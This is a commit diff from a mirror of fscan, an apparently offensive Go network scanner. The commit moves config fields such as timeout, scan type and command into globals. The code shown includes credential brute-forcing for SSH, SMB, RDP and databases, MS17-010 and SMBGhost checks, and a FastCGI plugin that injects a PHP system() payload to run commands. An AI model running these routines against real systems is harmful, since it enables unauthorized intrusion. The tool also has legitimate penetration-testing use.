qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

减少info结构体大小

This commit is contained in:
影舞者 2022-07-03 23:41:39 +08:00
parent 8e1db5995e
commit b9b5eb9ce4
24 changed files with 119 additions and 122 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Plugins/CVE-2020-0796.go
View File

@ -103,7 +103,7 @@ func SmbGhost(info *common.HostInfo) error {
}
func SmbGhostScan(info *common.HostInfo) error {
ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second
addr := fmt.Sprintf("%s:%v", info.Host, port)
conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout)
defer func() {

14
Plugins/NetBIOS.go
View File

@ -56,7 +56,7 @@ func NetBIOS(info *common.HostInfo) error {
}
msg += fmt.Sprintf("[*] %-15s%-5s %s\\%-15s %s", info.Host, isdc, nbname.group, nbname.unique, nbname.osversion)
if info.Scantype == "netbios" {
if common.Scantype == "netbios" {
msg += "\n-------------------------------------------\n" + nbname.msg
}
if len(nbname.group) > 0 || len(nbname.unique) > 0 {
@ -75,16 +75,16 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
payload0 = append(payload0, []byte("\x00 EOENEBFACACACACACACACACACACACACA\x00")...)
}
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil{
if conn != nil {
conn.Close()
}
}()
if err != nil {
return
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return
}
@ -194,16 +194,16 @@ func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
realhost := fmt.Sprintf("%s:%v", info.Host, 137)
conn, err := net.DialTimeout("udp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil{
if conn != nil {
conn.Close()
}
}()
if err != nil {
return
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return
}

12
Plugins/fcgiscan.go
View File

@ -23,17 +23,17 @@ func FcgiScan(info *common.HostInfo) {
return
}
url := "/etc/issue"
if info.Path != "" {
url = info.Path
if common.Path != "" {
url = common.Path
}
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
var reqParams string
var cutLine = "-----ASDGTasdkk361363s-----\n"
switch {
case info.Command == "read":
case common.Command == "read":
reqParams = ""
case info.Command != "":
reqParams = "<?php system('" + info.Command + "');die('" + cutLine + "');?>"
case common.Command != "":
reqParams = "<?php system('" + common.Command + "');die('" + cutLine + "');?>"
default:
reqParams = "<?php system('whoami');die('" + cutLine + "');?>"
}
@ -54,7 +54,7 @@ func FcgiScan(info *common.HostInfo) {
env["REQUEST_METHOD"] = "GET"
}
fcgi, err := New(addr, info.Timeout)
fcgi, err := New(addr, common.Timeout)
defer func() {
if fcgi.rwc != nil {
fcgi.rwc.Close()

4
Plugins/findnet.go
View File

@ -22,7 +22,7 @@ func Findnet(info *common.HostInfo) error {
func FindnetScan(info *common.HostInfo) error {
realhost := fmt.Sprintf("%s:%v", info.Host, 135)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -31,7 +31,7 @@ func FindnetScan(info *common.HostInfo) error {
if err != nil {
return err
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return err
}

4
Plugins/ftp.go
View File

@ -38,7 +38,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -50,7 +50,7 @@ func FtpScan(info *common.HostInfo) (tmperr error) {
func FtpConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(info.Timeout)*time.Second)
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second)
if err == nil {
err = conn.Login(Username, Password)
if err == nil {

6
Plugins/memcached.go
View File

@ -9,14 +9,14 @@ import (
func MemcachedScan(info *common.HostInfo) (err error) {
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
client, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if client != nil{
if client != nil {
client.Close()
}
}()
if err == nil {
err = client.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = client.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err == nil {
_, err = client.Write([]byte("stats\n")) //Set the key randomly to prevent the key on the server from being overwritten
if err == nil {

5
Plugins/mongodb.go
View File

@ -12,7 +12,6 @@ func MongodbScan(info *common.HostInfo) error {
if common.IsBrute {
return nil
}
_, err := MongodbUnauth(info)
if err != nil {
errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
@ -25,7 +24,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
senddata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -34,7 +33,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
if err != nil {
return flag, err
}
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return flag, err
}

4
Plugins/ms17010.go
View File

@ -33,7 +33,7 @@ func MS17010(info *common.HostInfo) error {
func MS17010Scan(info *common.HostInfo) error {
ip := info.Host
// connecting to a host in LAN if reachable should be very quick
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -43,7 +43,7 @@ func MS17010Scan(info *common.HostInfo) error {
//fmt.Printf("failed to connect to %s\n", ip)
return err
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
//fmt.Printf("failed to connect to %s\n", ip)
return err

8
Plugins/mssql.go
View File

@ -27,7 +27,7 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -39,11 +39,11 @@ func MssqlScan(info *common.HostInfo) (tmperr error) {
func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(info.Timeout)*time.Second)
dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", Host, Username, Password, Port, time.Duration(common.Timeout)*time.Second)
db, err := sql.Open("mssql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()

8
Plugins/mysql.go
View File

@ -27,7 +27,7 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mysql"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -39,11 +39,11 @@ func MysqlScan(info *common.HostInfo) (tmperr error) {
func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(info.Timeout)*time.Second)
dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v", Username, Password, Host, Port, time.Duration(common.Timeout)*time.Second)
db, err := sql.Open("mysql", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()

6
Plugins/oracle.go
View File

@ -27,7 +27,7 @@ func OracleScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["oracle"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -42,8 +42,8 @@ func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err
dataSourceName := fmt.Sprintf("oracle://%s:%s@%s:%s/orcl", Username, Password, Host, Port)
db, err := sql.Open("oracle", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
db.SetConnMaxIdleTime(time.Duration(common.Timeout) * time.Second)
db.SetMaxIdleConns(0)
defer db.Close()
err = db.Ping()

4
Plugins/postgres.go
View File

@ -27,7 +27,7 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -42,7 +42,7 @@ func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, e
dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
db, err := sql.Open("postgres", dataSourceName)
if err == nil {
db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
defer db.Close()
err = db.Ping()
if err == nil {

2
Plugins/rdp.go
View File

@ -48,7 +48,7 @@ func RdpScan(info *common.HostInfo) (tmperr error) {
for i := 0; i < common.BruteThread; i++ {
wg.Add(1)
go worker(info.Host, info.Domain, port, &wg, brlist, &signal, &num, all, &mutex, info.Timeout)
go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout)
}
close(brlist)

10
Plugins/redis.go
View File

@ -36,7 +36,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -47,7 +47,7 @@ func RedisScan(info *common.HostInfo) (tmperr error) {
func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -56,7 +56,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
if err != nil {
return flag, err
}
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return flag, err
}
@ -87,7 +87,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
defer func() {
if conn != nil {
conn.Close()
@ -96,7 +96,7 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
if err != nil {
return flag, err
}
err = conn.SetReadDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
if err != nil {
return flag, err
}

12
Plugins/scanner.go
View File

@ -26,17 +26,17 @@ func Scan(info common.HostInfo) {
Hosts = CheckLive(Hosts, common.Ping)
fmt.Println("[*] Icmp alive hosts len is:", len(Hosts))
}
if info.Scantype == "icmp" {
if common.Scantype == "icmp" {
common.LogWG.Wait()
return
}
var AlivePorts []string
if info.Scantype == "webonly" {
if common.Scantype == "webonly" {
AlivePorts = NoPortScan(Hosts, info.Ports)
} else {
AlivePorts = PortScan(Hosts, info.Ports, info.Timeout)
AlivePorts = PortScan(Hosts, info.Ports, common.Timeout)
fmt.Println("[*] alive ports len is:", len(AlivePorts))
if info.Scantype == "portscan" {
if common.Scantype == "portscan" {
common.LogWG.Wait()
return
}
@ -49,7 +49,7 @@ func Scan(info common.HostInfo) {
fmt.Println("start vulscan")
for _, targetIP := range AlivePorts {
info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
if info.Scantype == "all" || info.Scantype == "main" {
if common.Scantype == "all" || common.Scantype == "main" {
switch {
case info.Ports == "135":
AddScan(info.Ports, info, ch, &wg) //findnet
@ -66,7 +66,7 @@ func Scan(info common.HostInfo) {
AddScan("1000003", info, ch, &wg) //webtitle
}
} else {
port, _ := common.PORTList[info.Scantype]
port, _ := common.PORTList[common.Scantype]
scantype := strconv.Itoa(port)
AddScan(scantype, info, ch, &wg)
}

10
Plugins/smb.go
View File

@ -20,8 +20,8 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
flag, err := doWithTimeOut(info, user, pass)
if flag == true && err == nil {
var result string
if info.Domain != "" {
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, info.Domain, user, pass)
if common.Domain != "" {
result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, common.Domain, user, pass)
} else {
result = fmt.Sprintf("[+] SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
}
@ -35,7 +35,7 @@ func SmbScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
@ -52,7 +52,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, signal chan struc
Port: 445,
User: Username,
Password: Password,
Domain: info.Domain,
Domain: common.Domain,
Workstation: "",
}
@ -75,7 +75,7 @@ func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool,
select {
case <-signal:
return flag, err
case <-time.After(time.Duration(info.Timeout) * time.Second):
case <-time.After(time.Duration(common.Timeout) * time.Second):
return false, errors.New("time out")
}
}

18
Plugins/ssh.go
View File

@ -29,11 +29,11 @@ func SshScan(info *common.HostInfo) (tmperr error) {
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * info.Timeout) {
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
if info.SshKey != "" {
if common.SshKey != "" {
return err
}
}
@ -45,8 +45,8 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass
Auth := []ssh.AuthMethod{}
if info.SshKey != "" {
pemBytes, err := ioutil.ReadFile(info.SshKey)
if common.SshKey != "" {
pemBytes, err := ioutil.ReadFile(common.SshKey)
if err != nil {
return false, errors.New("read key failed" + err.Error())
}
@ -62,7 +62,7 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
config := &ssh.ClientConfig{
User: Username,
Auth: Auth,
Timeout: time.Duration(info.Timeout) * time.Second,
Timeout: time.Duration(common.Timeout) * time.Second,
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
return nil
},
@ -76,16 +76,16 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
defer session.Close()
flag = true
var result string
if info.Command != "" {
combo, _ := session.CombinedOutput(info.Command)
if common.Command != "" {
combo, _ := session.CombinedOutput(common.Command)
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
if info.SshKey != "" {
if common.SshKey != "" {
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct \n %v", Host, Port, string(combo))
}
common.LogSuccess(result)
} else {
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
if info.SshKey != "" {
if common.SshKey != "" {
result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct", Host, Port)
}
common.LogSuccess(result)

4
Plugins/webtitle.go
View File

@ -38,13 +38,13 @@ func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckData
info.Url = fmt.Sprintf("https://%s", info.Host)
default:
host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
protocol := GetProtocol(host, info.Timeout)
protocol := GetProtocol(host, common.Timeout)
info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
}
} else {
if !strings.Contains(info.Url, "://") {
host := strings.Split(info.Url, "/")[0]
protocol := GetProtocol(host, info.Timeout)
protocol := GetProtocol(host, common.Timeout)
info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
}
}

3
WebScan/lib/check.go
View File

@ -77,6 +77,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
return false, err, ""
}
variableMap := make(map[string]interface{})
defer func() { variableMap = nil }()
variableMap["request"] = req
for _, item := range p.Set {
k, expression := item.Key, item.Value
@ -123,7 +124,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
req.Url.Path = rule.Path
}
// 某些poc没有区分path和query需要处理
//req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, string([]rune(req.Url.Path))), strings.NewReader(rule.Body))

6
WebScan/lib/client.go
View File

@ -23,7 +23,7 @@ var (
func Inithttp(PocInfo common.PocInfo) {
//PocInfo.Proxy = "http://127.0.0.1:8080"
err := InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
err := InitHttpClient(PocInfo.Num, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
if err != nil {
log.Fatal(err)
}
@ -57,7 +57,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
} else {
return errors.New("Failed type assertion to DialContext")
}
}else if DownProxy != "" {
} else if DownProxy != "" {
if DownProxy == "1" {
DownProxy = "http://127.0.0.1:8080"
} else if DownProxy == "2" {
@ -65,7 +65,7 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
} else if !strings.Contains(DownProxy, "://") {
DownProxy = "http://127.0.0.1:" + DownProxy
}
if !strings.HasPrefix(DownProxy,"socks") && !strings.HasPrefix(DownProxy,"http") {
if !strings.HasPrefix(DownProxy, "socks") && !strings.HasPrefix(DownProxy, "http") {
return errors.New("no support this proxy")
}
u, err := url.Parse(DownProxy)

4
WebScan/lib/eval.go
View File

@ -599,13 +599,13 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
oResp, err = ClientNoRedirect.Do(req)
}
if err != nil {
fmt.Println(err)
//fmt.Println("[-]DoRequest error: ",err)
return nil, err
}
defer oResp.Body.Close()
resp, err := ParseResponse(oResp)
if err != nil {
fmt.Println(err)
fmt.Println("[-]ParseResponse error: ", err)
return nil, err
}
return resp, err

43
common/Parse.go
View File

@ -12,19 +12,19 @@ import (
)
func Parse(Info *HostInfo) {
ParseUser(Info)
ParseUser()
ParsePass(Info)
ParseInput(Info)
ParseScantype(Info)
}
func ParseUser(Info *HostInfo) {
if Info.Username == "" && Userfile == "" {
func ParseUser() {
if Username == "" && Userfile == "" {
return
}
if Info.Username != "" {
Info.Usernames = strings.Split(Info.Username, ",")
var Usernames []string
if Username != "" {
Usernames = strings.Split(Username, ",")
}
if Userfile != "" {
@ -32,37 +32,38 @@ func ParseUser(Info *HostInfo) {
if err == nil {
for _, user := range users {
if user != "" {
Info.Usernames = append(Info.Usernames, user)
Usernames = append(Usernames, user)
}
}
}
}
Info.Usernames = RemoveDuplicate(Info.Usernames)
Usernames = RemoveDuplicate(Usernames)
for name := range Userdict {
Userdict[name] = Info.Usernames
Userdict[name] = Usernames
}
}
func ParsePass(Info *HostInfo) {
if Info.Password != "" {
passs := strings.Split(Info.Password, ",")
var PwdList []string
if Password != "" {
passs := strings.Split(Password, ",")
for _, pass := range passs {
if pass != "" {
Info.Passwords = append(Info.Passwords, pass)
PwdList = append(PwdList, pass)
}
}
Passwords = Info.Passwords
Passwords = PwdList
}
if Passfile != "" {
passs, err := Readfile(Passfile)
if err == nil {
for _, pass := range passs {
if pass != "" {
Info.Passwords = append(Info.Passwords, pass)
PwdList = append(PwdList, pass)
}
}
Passwords = Info.Passwords
Passwords = PwdList
}
}
if UrlFile != "" {
@ -149,7 +150,7 @@ func ParseInput(Info *HostInfo) {
if UserAdd != "" {
user := strings.Split(UserAdd, ",")
for a, _ := range Userdict {
for a := range Userdict {
Userdict[a] = append(Userdict[a], user...)
Userdict[a] = RemoveDuplicate(Userdict[a])
}
@ -166,12 +167,12 @@ func ParseInput(Info *HostInfo) {
}
func ParseScantype(Info *HostInfo) {
_, ok := PORTList[Info.Scantype]
_, ok := PORTList[Scantype]
if !ok {
showmode()
}
if Info.Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
switch Info.Scantype {
if Scantype != "all" && Info.Ports == DefaultPorts+","+Webport {
switch Scantype {
case "rdp":
Info.Ports = "3389"
case "web":
@ -187,10 +188,10 @@ func ParseScantype(Info *HostInfo) {
case "main":
Info.Ports = DefaultPorts
default:
port, _ := PORTList[Info.Scantype]
port, _ := PORTList[Scantype]
Info.Ports = strconv.Itoa(port)
}
fmt.Println("-m ", Info.Scantype, " start scan the port:", Info.Ports)
fmt.Println("-m ", Scantype, " start scan the port:", Info.Ports)
}
}

32
common/config.go
View File

@ -45,28 +45,15 @@ var Webport = "80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,
var DefaultPorts = "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017"
type HostInfo struct {
Host string
Ports string
Domain string
Url string
Path string
Timeout int64
Scantype string
Command string
SshKey string
Username string
Password string
Usernames []string
Passwords []string
Infostr []string
Hash string
Host string
Ports string
Url string
Infostr []string
}
type PocInfo struct {
Num int
Rate int
Timeout int64
Proxy string
PocName string
PocDir string
Target string
@ -79,10 +66,19 @@ type PocInfo struct {
}
var (
Path string
Scantype string
Command string
SshKey string
Domain string
Username string
Password string
Proxy string
Timeout int64
WebTimeout int64
TmpOutputfile string
TmpSave bool
IsPing bool
IsWmi bool
Ping bool
Pocinfo PocInfo
IsWebCan bool

20
common/flag.go
View File

@ -25,14 +25,14 @@ func Flag(Info *HostInfo) {
flag.StringVar(&UserAdd, "usera", "", "add a user base DefaultUsers,-usera user")
flag.StringVar(&PassAdd, "pwda", "", "add a password base DefaultPasses,-pwda password")
flag.StringVar(&NoPorts, "pn", "", "the ports no scan,as: -pn 445")
flag.StringVar(&Info.Command, "c", "", "exec command (ssh)")
flag.StringVar(&Info.SshKey, "sshkey", "", "sshkey file (id_rsa)")
flag.StringVar(&Info.Domain, "domain", "", "smb domain")
flag.StringVar(&Info.Username, "user", "", "username")
flag.StringVar(&Info.Password, "pwd", "", "password")
flag.Int64Var(&Info.Timeout, "time", 3, "Set timeout")
flag.StringVar(&Info.Scantype, "m", "all", "Select scan type ,as: -m ssh")
flag.StringVar(&Info.Path, "path", "", "fcgi、smb romote file path")
flag.StringVar(&Command, "c", "", "exec command (ssh)")
flag.StringVar(&SshKey, "sshkey", "", "sshkey file (id_rsa)")
flag.StringVar(&Domain, "domain", "", "smb domain")
flag.StringVar(&Username, "user", "", "username")
flag.StringVar(&Password, "pwd", "", "password")
flag.Int64Var(&Timeout, "time", 3, "Set timeout")
flag.StringVar(&Scantype, "m", "all", "Select scan type ,as: -m ssh")
flag.StringVar(&Path, "path", "", "fcgi、smb romote file path")
flag.IntVar(&Threads, "t", 600, "Thread nums")
flag.IntVar(&LiveTop, "top", 10, "show live len top")
flag.StringVar(&HostFile, "hf", "", "host file, -hf ip.txt")
@ -55,10 +55,10 @@ func Flag(Info *HostInfo) {
flag.StringVar(&URL, "u", "", "url")
flag.StringVar(&UrlFile, "uf", "", "urlfile")
flag.StringVar(&Pocinfo.PocName, "pocname", "", "use the pocs these contain pocname, -pocname weblogic")
flag.StringVar(&Pocinfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
flag.StringVar(&Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080")
flag.StringVar(&Socks5Proxy, "socks5", "", "set socks5 proxy, will be used in tcp connection, timeout setting will not work")
flag.StringVar(&Pocinfo.Cookie, "cookie", "", "set poc cookie,-cookie rememberMe=login")
flag.Int64Var(&Pocinfo.Timeout, "wt", 5, "Set web timeout")
flag.Int64Var(&WebTimeout, "wt", 5, "Set web timeout")
flag.IntVar(&Pocinfo.Num, "num", 20, "poc rate")
flag.StringVar(&SC, "sc", "", "ms17 shellcode,as -sc add")
flag.Parse()